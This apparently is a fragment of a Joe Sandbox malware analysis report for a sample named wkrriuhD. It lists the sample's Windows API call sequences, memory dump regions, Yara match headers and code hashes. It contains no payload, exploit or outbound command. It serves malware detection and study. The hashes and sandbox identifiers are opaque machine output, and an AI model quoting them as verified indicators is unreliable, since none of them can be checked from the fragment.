• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1238F234), ref: 123793CF
• WideCharToMultiByte.KERNEL32(00000000,00000000,123A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 12379447
• WideCharToMultiByte.KERNEL32(00000000,00000000,123A27B8,000000FF,?,0000003F,00000000,?), ref: 12379474
• _free.LIBCMT ref: 12379589
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
• Opcode ID: 083b418cd4743830c217f3d355f17bd0aa5c550aaff6d0b899a68e11bd5262d6
• Instruction ID: 238b0b7ee6e5c4326821c3ff76192a4f101714f550fa458f5dafe42b2c6b7a46
• Opcode Fuzzy Hash: 083b418cd4743830c217f3d355f17bd0aa5c550aaff6d0b899a68e11bd5262d6
• Instruction Fuzzy Hash: 93C10577A00259AFDF10DF788884BEABBBDEF45310F1447AAD894D7281E7399A01CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
• Instruction ID: db65b09532d72b336b0967c496e0075548ddd3567a16148ad91bafc8c5a64272
• Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
• Instruction Fuzzy Hash: CB61C371904645AFDB24CF6AC845BAEBFF4FF48720F14416AE988EB352E7309E418B54
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,14649C07,?,00000000,?,00000000,00000000), ref: 146494D4
• __fassign.LIBCMT ref: 1464954F
• __fassign.LIBCMT ref: 1464956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 14649590
• WriteFile.KERNEL32(?,?,00000000,14649C07,00000000,?,?,?,?,?,?,?,?,?,14649C07,?), ref: 146495AF
• WriteFile.KERNEL32(?,?,00000001,14649C07,00000000,?,?,?,?,?,?,?,?,?,14649C07,?), ref: 146495E8
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 9849fb73de1cadd40aa81494c75e309f9a88147f81f17ca1a4a8badde56ce1d9
• Instruction ID: ce2776d6348a44cfb328e69a18ce76dfc42dd341fe8c0a896d30eceb7567e073
• Opcode Fuzzy Hash: 9849fb73de1cadd40aa81494c75e309f9a88147f81f17ca1a4a8badde56ce1d9
• Instruction Fuzzy Hash: 8851B371E40249AFDF10CFB4D895ADEBBF8EF19304F28451AE955E7281D730A945CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,1237BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1237B3FE
• __fassign.LIBCMT ref: 1237B479
• __fassign.LIBCMT ref: 1237B494
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1237B4BA
• WriteFile.KERNEL32(?,FF8BC35D,00000000,1237BB31,00000000,?,?,?,?,?,?,?,?,?,1237BB31,?), ref: 1237B4D9
• WriteFile.KERNEL32(?,?,00000001,1237BB31,00000000,?,?,?,?,?,?,?,?,?,1237BB31,?), ref: 1237B512
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: d283178fc17509835c7ae89a448a37a9d1ab711499eeba4d03d73c5f757fd427
• Instruction ID: 515c6bc304ef72fd92038a15449ffe5571ac1390bc6ca21118a10153e7616619
• Opcode Fuzzy Hash: d283178fc17509835c7ae89a448a37a9d1ab711499eeba4d03d73c5f757fd427
• Instruction Fuzzy Hash: 4C51B8B1E002499FDF14CFA8C885AEEBBF9EF49310F14456AEA55E7281E7349941CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 1464339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 146433A3
• _ValidateLocalCookies.LIBCMT ref: 14643431
• __IsNonwritableInCurrentImage.LIBCMT ref: 1464345C
• _ValidateLocalCookies.LIBCMT ref: 146434B1
Strings
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: edda5af013552127bde66a48f929a3902236393e46c495d0afb9ef7fc684b5fc
• Instruction ID: 4ef30b5a0da812f516a0605fa02d3ea01893116a152342b2032d3864f692c1b1
• Opcode Fuzzy Hash: edda5af013552127bde66a48f929a3902236393e46c495d0afb9ef7fc684b5fc
• Instruction Fuzzy Hash: 3041E938F003489BDF01CFA8C884ADEBBB5AF5532CF288155D915AB391D731EA91CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000050,Semaphore error ,?), ref: 0040A7B5
• GetStdHandle.KERNEL32(000000F4,Semaphore error ,?), ref: 0040A800
• WriteFile.KERNEL32(00000000,0040FA90,00000002,?,00000000,000000F4,Semaphore error ,?), ref: 0040A815
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,0040FA90,00000002,?,00000000,000000F4,Semaphore error ,?), ref: 0040A82A
• WriteFile.KERNEL32(00000000,0040FA93,00000002,?,00000000,00000000,?,00000000,?,00000000,00000000,0040FA90,00000002,?,00000000,000000F4), ref: 0040A83D
Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: File$Write$HandleModuleName
• String ID: Semaphore error
• API String ID: 299019120-2356287382
• Opcode ID: 8b4ebf8a01121c22523c02ab895f82b6948ef1d9d7e44797e701a40e8bc1afb1
• Instruction ID: dacfb2d6354fe0840da98f0422ce138300a64ded8d62c48eabc067c910f233f1
• Opcode Fuzzy Hash: 8b4ebf8a01121c22523c02ab895f82b6948ef1d9d7e44797e701a40e8bc1afb1
• Instruction Fuzzy Hash: BB21C872640305B9E720E2B28C46FAB322C9B05714F108537B605B61C2E6BC9E158ABF
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 14649221: _free.LIBCMT ref: 1464924A
• _free.LIBCMT ref: 146492AB
  • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
  • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
• _free.LIBCMT ref: 146492B6
• _free.LIBCMT ref: 146492C1
• _free.LIBCMT ref: 14649315
• _free.LIBCMT ref: 14649320
• _free.LIBCMT ref: 1464932B
• _free.LIBCMT ref: 14649336
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction ID: 3c00c33bb0dc4e5a5f6fb5b52c13a2e331de93c76ffe5c20aaf44fee7fc2651e
• Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction Fuzzy Hash: 1611B1355A2B08FAEF22ABF0CC45FCB7B9D9F10308F580834A69976952DA34B4084749
Uniqueness

Uniqueness Score: -1.00%

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 005A1F52
• int.LIBCPMT ref: 005A1F65
  • Part of subcall function 0059EEA3: std::_Lockit::_Lockit.LIBCPMT ref: 0059EEB4
  • Part of subcall function 0059EEA3: std::_Lockit::~_Lockit.LIBCPMT ref: 0059EECE
• std::_Facet_Register.LIBCPMT ref: 005A1FA5
• std::_Lockit::~_Lockit.LIBCPMT ref: 005A1FAE
• __CxxThrowException@8.LIBVCRUNTIME ref: 005A1FCC
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: (mG
• API String ID: 2536120697-4059303827
• Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
• Instruction ID: 403d47d9a2563ac1bc90502e311840504f77752c65a8443ae9db383ef40bcad6
• Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
• Instruction Fuzzy Hash: 4D110632A00519AFCB10EBA8E90A9DDBF78FF81720F10456AF804A7291DB319E41CBD4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,1236A351,123692BE), ref: 1236A368
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1236A376
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1236A38F
• SetLastError.KERNEL32(00000000,?,1236A351,123692BE), ref: 1236A3E1
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: da43f334add93bd16fed927777e93a555aaa764f404b655859ac46518176ef7c
• Instruction ID: b40f45bb21ebdcc7a77afe13af1a69e645184d7645e0843e0d70937dbe4869a5
• Opcode Fuzzy Hash: da43f334add93bd16fed927777e93a555aaa764f404b655859ac46518176ef7c
• Instruction Fuzzy Hash: 9E0147BB24C3669EE35616FA6CC57BB364CEB467F5330033AE01CD40D8EF919A069240
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: {-Y
• API String ID: 269201875-2507730204
• Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
• Instruction ID: 83a5ec52acd167b3042d6edbe61e0f325a98b96e5bbea94743780baf4128faac
• Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
• Instruction Fuzzy Hash: C8F04F3250864467C634EB6DF8C6D1A7BD9FA48B607A8881AF148DB711DB30FD80C65C
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040A95C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 0040A969
                                                                                                                                                                                          • GetVersionExA.KERNEL32 ref: 0040A98E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: AddressHandleModuleProcVersion
• String ID: Borland32$GetProcAddress$kernel32.dll
• API String ID: 3310240892-88975745
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID:
• String ID: XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$tp1$tp1->tpName$tp2$tp2->tpName
• API String ID: 0-2803269351
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,14646FFD,00000000,?,?,?,14648A72,?,?,00000100), ref: 1464887B
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,14648A72,?,?,00000100,5EFC4D8B,?,?), ref: 14648901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 146489FB
• __freea.LIBCMT ref: 14648A08
  • Part of subcall function 146456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 14645702
• __freea.LIBCMT ref: 14648A11
• __freea.LIBCMT ref: 14648A36
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _strlen.LIBCMT ref: 14641607
• _strcat.LIBCMT ref: 1464161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1464190E,?,?,00000000,?,00000000), ref: 14641643
• lstrcatW.KERNEL32(?,?), ref: 1464165A
• lstrlenW.KERNEL32(?,?,?,?,?,1464190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 14641661
• lstrcatW.KERNEL32(00001008,?), ref: 14641686
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcatW.KERNEL32(?,?), ref: 14641038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1464104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 14641061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 14641075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 14641090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 146410B8
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,14643518,146423F1,14641F17), ref: 14643864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 14643872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1464388B
• SetLastError.KERNEL32(00000000,?,14643518,146423F1,14641F17), ref: 146438DD
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,14646C6C), ref: 14645AFA
                                                                                                                                                                                          • _free.LIBCMT ref: 14645B2D
                                                                                                                                                                                          • _free.LIBCMT ref: 14645B55
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,14646C6C), ref: 14645B62
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,14646C6C), ref: 14645B6E
                                                                                                                                                                                          • _abort.LIBCMT ref: 14645B74
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                          • Opcode ID: 1b76eeb4b50df33d0fa3dc14a387e1e1058fa8f17b92b27cc432244fc2dbfb6c
                                                                                                                                                                                          • Instruction ID: 006cab5c7c0b8b9cd27ef33af6fd73c5b2833cbc7cdf8e916c5547e83b6898f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b76eeb4b50df33d0fa3dc14a387e1e1058fa8f17b92b27cc432244fc2dbfb6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF0A43A605611FBEF1326346C58E5A2A2DCBF1A6DB3C0128FB14A7A80FE3498034169
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000020,?,1236A7F5,?,?,?,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B), ref: 12378219
                                                                                                                                                                                          • _free.LIBCMT ref: 1237824C
                                                                                                                                                                                          • _free.LIBCMT ref: 12378274
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 12378281
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,1236F9A8,?,?,00000020,00000000,?,?,?,1235DD01,0000003B,?,00000041,00000000,00000000), ref: 1237828D
                                                                                                                                                                                          • _abort.LIBCMT ref: 12378293
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                          • Opcode ID: 743f54f30b9df6e59dd653045cd0daf94e86ef2d64abaef5a00871d68267c6f5
                                                                                                                                                                                          • Instruction ID: 254628428d53812d1f91725ac887788409f8d2f13dde966c29bf5e30c3dbc376
                                                                                                                                                                                          • Opcode Fuzzy Hash: 743f54f30b9df6e59dd653045cd0daf94e86ef2d64abaef5a00871d68267c6f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11F02D7B544B916ACF9222285C48FAB361D8FD23B2F240B24F818D2290EF3C9C02B550
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • @__lockDebuggerData$qv.WKRRIUHD ref: 00402A6E
                                                                                                                                                                                          • @__unlockDebuggerData$qv.WKRRIUHD ref: 00402B4A
                                                                                                                                                                                          • RaiseException.KERNEL32(0EEFFACE,00000001,00000003,?), ref: 00402BE0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Data$qvDebugger$@__lock@__unlockExceptionRaise
                                                                                                                                                                                          • String ID: XX.CPP$cctrAddr
                                                                                                                                                                                          • API String ID: 3785177639-3056909104
                                                                                                                                                                                          • Opcode ID: 9b0dcf674f86b935d2a4c104f27c6c37c2c543f1610da28e0affacaed0fd5f83
                                                                                                                                                                                          • Instruction ID: dc70eccd86edc0d9cac4dc8b0ae7afb86e4c01960d635f7c74c805de0bb0e1ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b0dcf674f86b935d2a4c104f27c6c37c2c543f1610da28e0affacaed0fd5f83
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF913B74A00258DFCB14DFA9D585BA9B7B1BF48308F1481BEF8486B392C779D841CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                                          • String ID: S~E$PG$PG$PG
                                                                                                                                                                                          • API String ID: 3519838083-2466073847
                                                                                                                                                                                          • Opcode ID: 38c21b094f1b4e1a64d7b2f97ecc41d8024848913b57eda60fc2449cd9e24858
                                                                                                                                                                                          • Instruction ID: 3175648e28e0643b1dc24d56847e604a8b7a4daf931bc55a90ee1b9fc0180788
                                                                                                                                                                                          • Opcode Fuzzy Hash: 38c21b094f1b4e1a64d7b2f97ecc41d8024848913b57eda60fc2449cd9e24858
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8451AD60A4024ABBCF18FBB4CC5AAFE7F69BF95300F40402AF445AB192EF285E45C751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 005C5552: __onexit.LIBCMT ref: 005C5558
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 005926A0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                                          • String ID: PkG$XMG$NG$NG
                                                                                                                                                                                          • API String ID: 1881088180-3151166067
                                                                                                                                                                                          • Opcode ID: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
                                                                                                                                                                                          • Instruction ID: 4a5d9f88e918a97b5e1376e7c42c5111c7ec6cfb422a0c58c7e074bdd15dcca3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9419131104711ABCB24FB68DDAAAEE7B9ABBC1310F10452DF44AD61E2EF306D4AC755
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: PkGNG
                                                                                                                                                                                          • API String ID: 0-263838557
                                                                                                                                                                                          • Opcode ID: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
